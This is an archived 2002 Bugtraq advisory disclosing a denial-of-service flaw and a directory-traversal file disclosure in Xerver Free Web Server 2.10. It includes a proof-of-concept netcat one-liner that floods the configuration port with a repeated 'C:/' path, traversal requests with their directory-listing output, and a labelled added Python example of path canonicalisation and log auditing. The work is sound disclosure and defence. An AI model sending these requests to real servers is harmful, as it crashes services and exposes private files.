Bugtraq mailing list archives

Xerver-2.10-File-Disclosure&DoS-attack


From: Alex Hernandez <al3xhernandez () ureach com>
Date: Fri, 8 Mar 2002 18:39:39 -0500

------oOo------
Xerver Free Web Server 2.10 File Disclosure & DoS (Denial of Service Attack).
------oOo------

Company Affected: www.JavaScript.nu
Version: v2.10
Date Added: 02-27-02
Size: 287 KB
OS Affected: Windows ALL, Linux ALL, BSD ALL, Solaris ALL, MAC ALL.

Author:

** Alex Hernandez <al3xhernandez () ureach com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

Also a greet to "KF" <dotslash () snosoft com> http://www.snosoft.com for inviting me
to take part in more research into bugs, exploits and vulnerabilities :-)
Thanks friend, you have published excellent bugs :X

----=[Brief Description]=------------


Xerver Free Web Server is a tiny web server allowing you to run CGI/perl scripts on
your computer. Xerver includes features such as: allow/forbid directory listing,
create your own error pages ("404 File Not Found"), allow/deny CGI-scripts, choose
your own index file extensions, share/unshare hidden files or files with certain
file extensions, share unlimited folders etc. Xerver is a tiny, fast and free web
server, but is still advanced and supports both HTTP/1.1 and HTTP/1.0 and all HTTP
methods (GET, POST and HEAD). "Run CGI/perl scripts on your computer."


----=[Summary]=----------------------

Two vulnerabilities exist:

Port 32123 is normally the server's configuration port. The server can be crashed
by sending that port a request whose path repeats the drive "C:/" a very large
number of times.

The second bug is remote file disclosure: any user can read the configuration
files on the system. Even when the server has been configured to deny access to
certain folders or files, any user can reach them through port 80 with a
directory traversal request, and so find the server's own configuration.


------oOo------
Proof of concept


DoS

http://localhost:32123

$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" | nc -vvn 127.0.0.1 32123


Exploitation:

Example 1:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY BGCOLOR=white COLOR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for /</H2></FONT><PRE>    <B>File name                       File size&nbsp;    Last modified</B>


Program Files
--------------------------------------------------------------------------------
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORDER=0> Program Files</A>
--------------------------------------------------------------------------------

RECYCLER
--------------------------------------------------------------------------------
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORDER=0> RECYCLER</A>
--------------------------------------------------------------------------------

WINNT
--------------------------------------------------------------------------------
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORDER=0> WINNT</A>
--------------------------------------------------------------------------------

[...]

or via web:



http://localhost/unix/ALEX/Xerver2.10/../../../ 

Directory Listing for /

    File name                       File size     Last modified

 $unix
 ALEX
 Documents and Settings
 My Downloads
 Program Files
 RECYCLER

[...]


Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP/1.0

The result is:

Directory Listing for /WINNT/system32/


File name                             File size     Last modified
 ../
 AdCache
 CatRoot
 Com
 DTCLog
 DirectX
 GroupPolicy
 Hummbird
 IOSUBSYS
 Macromed
 Microsoft

[...]
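The summary and the two proofs of concept above come down to two missing checks: the server applies its folder/file restrictions before the request path is canonicalised (so "../../../" walks past them), and it puts no bound on the request-target (so a path that repeats "C:/" hundreds of thousands of times exhausts it). The Python below is an added example written for this archive page; it is not Xerver's code, and the length limit, the deny rule for top-level folders and the access-log lines are constructed assumptions. It shows the raw-path check that the advisory's traversal bypasses next to the same rule applied to the canonical path, refuses paths that climb above the served folder or exceed the length bound, and runs those checks over constructed log lines so the advisory's requests can be recognised after the fact.

```python
"""Added example: canonicalise-then-authorise checks for the two Xerver 2.10
issues above. Not Xerver code; MAX_TARGET_LEN, DENIED_TOP_LEVEL and the log
lines are constructed assumptions."""
import re
from urllib.parse import unquote

MAX_TARGET_LEN = 4096                                                 # assumed bound
DENIED_TOP_LEVEL = {"WINNT", "Program Files", "Documents and Settings"}  # assumed deny rule


class RequestRejected(Exception):
    """A request-target a hardened server should refuse outright."""


def canonical_segments(request_target):
    """Decode and normalise a request-target into path segments under the
    served folder. Raises RequestRejected when the path climbs above that
    folder, contains a NUL byte, or is longer than MAX_TARGET_LEN (the
    resource-exhaustion case). An empty list means the folder root."""
    if len(request_target) > MAX_TARGET_LEN:
        raise RequestRejected("request-target too long")
    path = unquote(request_target.split("?", 1)[0])   # decode %2e%2e etc. once
    path = path.replace("\\", "/")                    # "..\" separates on Windows hosts
    stack = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                raise RequestRejected("path climbs above the served folder")
            stack.pop()
        elif "\x00" in seg:
            raise RequestRejected("NUL byte in path")
        else:
            stack.append(seg)
    return stack


def naive_is_denied(request_target):
    """The shape of check the advisory's traversal walks past: it compares the
    raw request-target, so "/x/../WINNT/" never starts with "/WINNT"."""
    return any(request_target.startswith("/" + d) for d in DENIED_TOP_LEVEL)


def is_denied(request_target):
    """The same rule applied to the canonical path, which is what reaches disk."""
    segs = canonical_segments(request_target)
    return bool(segs) and segs[0] in DENIED_TOP_LEVEL


# Constructed Common Log Format lines (not real Xerver logs) carrying the
# advisory's two traversal requests, a benign request and an oversized one.
SAMPLE_LOG = "\n".join([
    '127.0.0.1 - - [06/Mar/2002:20:52:51 -0600] "GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0" 200 1532',
    '127.0.0.1 - - [06/Mar/2002:20:53:10 -0600] "GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP/1.0" 200 4410',
    '127.0.0.1 - - [06/Mar/2002:20:55:02 -0600] "GET /index.html HTTP/1.1" 200 812',
    '127.0.0.1 - - [06/Mar/2002:20:56:40 -0600] "GET /' + "C:/" * 2000 + ' HTTP/1.0" 400 0',
])

LOG_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/\d\.\d"')


def audit_log(text):
    """Return (line number, reason) for each logged request that the checks
    above would reject, plus any that used a dot-dot segment even though it
    stayed inside the served folder (a traversal attempt worth alerting on)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group(2)
        try:
            canonical_segments(target)
        except RequestRejected as exc:
            findings.append((lineno, f"rejected: {exc}"))
            continue
        if ".." in unquote(target).replace("\\", "/").split("/"):
            findings.append((lineno, "dot-dot segment inside the served folder"))
    return findings


if __name__ == "__main__":
    probe = "/unix/ALEX/Xerver2.10/../../../WINNT/system32/"
    print("naive deny:", naive_is_denied(probe), " canonical deny:", is_denied(probe))
    for lineno, reason in audit_log(SAMPLE_LOG):
        print(f"line {lineno}: {reason}")
```

The point of the two deny functions is the order of operations: the advisory's request to /WINNT/system32/ passes `naive_is_denied` because the rule sees the raw string, and fails `is_denied` because the rule sees what the filesystem will see. The length bound is checked before any decoding so that the oversized request is dropped at the cheapest possible point.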


------oOo------------------------------------
Vendor Response:
The vendor was notified:
"Omid Rouhani" webmaster () javascript nu
http://www.JavaScript.nu
Temporary patch: restrict files and directories.

Alex Hernandez <al3xhernandez () ureach com> (c) 2002.

------oOo------------------------------------




